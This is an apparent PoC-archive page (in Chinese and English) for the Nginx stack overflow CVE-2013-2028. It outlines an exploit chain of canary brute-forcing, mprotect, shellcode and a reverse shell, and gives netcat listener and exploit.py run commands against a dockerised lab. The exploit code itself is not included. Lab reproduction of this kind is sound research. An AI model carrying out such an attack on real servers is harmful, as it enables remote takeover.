关联漏洞
标题:
F5 Nginx 缓冲区错误漏洞
(CVE-2013-2028)
描述:F5 Nginx是美国F5公司的一款轻量级Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like协议下发行。 F5 Nginx 1.3.9版本至1.4.0版本存在缓冲区错误漏洞。攻击者利用该漏洞导致系统拒绝服务或执行任意代码。
描述
CVE-2013-2028 python exploit
介绍
# CVE-2013-2028 Exploit
## Vulnerability details
Vulnerable software: Nginx 1.3.9 < 1.4.0
Commit with fix: <https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7>
Vulnerability exists in function ngx_http_parse_chunked. This exploit triggers integer overflow in ngx_http_parse_chunked, and later using it overflows the stack to hijack control flow.
## Exploitation details
Actual exploit contains 4 steps:
1. Find value of the stack canary using byte-by-byte bruteforce
2. Calculate address of mprotect using value from rcx (points somewhere in lpthread). Call mprotect with appropriate arguments.
3. Copy shellcode to RWX memory location.
4. Jump to shellcode, and start reverse shell.
## How to reproduce
1. start listener on host system, for example using netcat: `nc -lvp 4345`
2. on virtual machine start docker: `sudo docker-compose up --build`
3. run exploit: `python2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>`
4. Let the exploit find actual value of the canary, and start reverse-shell.
文件快照
[4.0K] /data/pocs/725bd69b566daa24461ab9a517a9a1a11467c294
├── [ 82] docker-compose.yml
├── [ 372] Dockerfile
├── [5.4K] exploit.py
└── [1.1K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。